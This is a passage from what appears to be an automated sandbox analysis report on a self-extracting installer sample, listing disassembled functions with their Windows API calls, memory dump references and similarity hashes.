                                                                      • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                                      • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                                      • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                                      • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                                      • GetParent.USER32(?), ref: 00407418
                                                                      • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                                      • ClientToScreen.USER32(?,?), ref: 0040743D
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                                      • GetClientRect.USER32(?,?), ref: 0040753D
                                                                        • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                                        • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                                      • ClientToScreen.USER32(?,?), ref: 00407446
                                                                        • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                      • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                                      • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                      • String ID:
                                                                      • API String ID: 747815384-0
                                                                      • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                      • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                                      • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                                      • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                                      Function 00403400 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                                      • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                        • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                      • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: 0VA$SetEnvironment${\rtf
                                                                      • API String ID: 613200358-2390373888
                                                                      • Opcode ID: d2b1c421a04f985f795d6f716a120d89dd10d32365d08795990d937a98e965f4
                                                                      • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                                      • Opcode Fuzzy Hash: d2b1c421a04f985f795d6f716a120d89dd10d32365d08795990d937a98e965f4
                                                                      • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49
                                                                      Function 0041382F Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                      • String ID:
                                                                      • API String ID: 801014965-0
                                                                      • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                      • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                                      • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                                      • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                                      Function 00407823 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00407831
                                                                      • GetWindowLongW.USER32(00000000), ref: 00407838
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                                      • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                                      • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                                      • GetWindowDC.USER32(?), ref: 00407896
                                                                      • GetWindowRect.USER32(?,?), ref: 004078A3
                                                                      • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                                      • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                      • String ID:
                                                                      • API String ID: 2586545124-0
                                                                      • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                      • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                                      • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                                      • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                                      Function 00403BA2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                                        • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                                      • wsprintfA.USER32 ref: 00403C31
                                                                      • wsprintfA.USER32 ref: 00403C5E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$wsprintf
                                                                      • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                      • API String ID: 2704270482-695273242
                                                                      • Opcode ID: 9ae0ee48d956ebc158ea1b515db1e5daa1460f0fae3ddab712f6acd0183a952e
                                                                      • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                                      • Opcode Fuzzy Hash: 9ae0ee48d956ebc158ea1b515db1e5daa1460f0fae3ddab712f6acd0183a952e
                                                                      • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                                      Function 00407028 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                                      • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                                      • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                                      • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                                      • GetDlgItem.USER32(?,?), ref: 0040707A
                                                                      • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                                      • GetDlgItem.USER32(?,?), ref: 0040708B
                                                                      • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMessageSend$Focus
                                                                      • String ID:
                                                                      • API String ID: 3946207451-0
                                                                      • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                      • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                                      • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                                      • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                                      Function 00407649 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                                      • GetWindow.USER32(?,00000005), ref: 0040767B
                                                                      • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Window$AddressLibraryLoadProc
                                                                      • String ID: hA$SetWindowTheme$uxtheme
                                                                      • API String ID: 324724604-1539679821
                                                                      • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                      • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                                      • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                                      • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                                      Function 0040769E Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                                      • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                                      • GetDC.USER32(00000000), ref: 004076E7
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                                      • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                      • String ID:
                                                                      • API String ID: 2693764856-0
                                                                      • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                      • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                                      • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                                      • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                                      Function 0040720C Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 0040721C
                                                                      • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                                      • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                                      • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                                      • SelectObject.GDI32(?,?), ref: 00407266
                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                                      • SelectObject.GDI32(?,?), ref: 004072A7
                                                                      • ReleaseDC.USER32(?,?), ref: 004072B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                      • String ID:
                                                                      • API String ID: 2466489532-0
                                                                      • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                      • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                                      • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                      • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                                      Function 00408196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                                      • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                                      • wsprintfW.USER32 ref: 0040821E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                      • String ID: %d%%
                                                                      • API String ID: 3753976982-1518462796
                                                                      • Opcode ID: 42cd89c95a49925efe798b81d99ff8d4be5088a633c9ff9fdeeda3677ef6b080
                                                                      • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                                      • Opcode Fuzzy Hash: 42cd89c95a49925efe798b81d99ff8d4be5088a633c9ff9fdeeda3677ef6b080
                                                                      • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                                      Function 004083AD Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EndDialog.USER32(?,00000000), ref: 004083C7
                                                                      • KillTimer.USER32(?,00000001), ref: 004083D8
                                                                      • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                                      • SuspendThread.KERNEL32(00000298), ref: 0040841B
                                                                      • ResumeThread.KERNEL32(00000298), ref: 00408438
                                                                      • EndDialog.USER32(?,00000000), ref: 0040845A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: DialogThreadTimer$KillResumeSuspend
                                                                      • String ID:
                                                                      • API String ID: 4151135813-0
                                                                      • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                      • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                                      • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                      • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                                      Function 00404032 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: %%M/$%%M\
                                                                      • API String ID: 613200358-4143866494
                                                                      • Opcode ID: 8677c02abf867bd37ca258bec985b4f5904aef2a07f64a71b164819d4d184b46
                                                                      • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                                      • Opcode Fuzzy Hash: 8677c02abf867bd37ca258bec985b4f5904aef2a07f64a71b164819d4d184b46
                                                                      • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                                      Function 00403EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: %%T/$%%T\
                                                                      • API String ID: 613200358-2679640699
                                                                      • Opcode ID: f3f3d5414f060ac97f84cd4fb4e76d4c066e7be8abca8f8d98a1b02d4c47ed12
                                                                      • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                                      • Opcode Fuzzy Hash: f3f3d5414f060ac97f84cd4fb4e76d4c066e7be8abca8f8d98a1b02d4c47ed12
                                                                      • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                                      Function 00403F77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: %%S/$%%S\
                                                                      • API String ID: 613200358-358529586
                                                                      • Opcode ID: 328ca1379e14b8368c30dedf60bee0167d5db9aa9a8115ce74c1d677a53725c7
                                                                      • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                                      • Opcode Fuzzy Hash: 328ca1379e14b8368c30dedf60bee0167d5db9aa9a8115ce74c1d677a53725c7
                                                                      • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                                      Function 0040D79C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
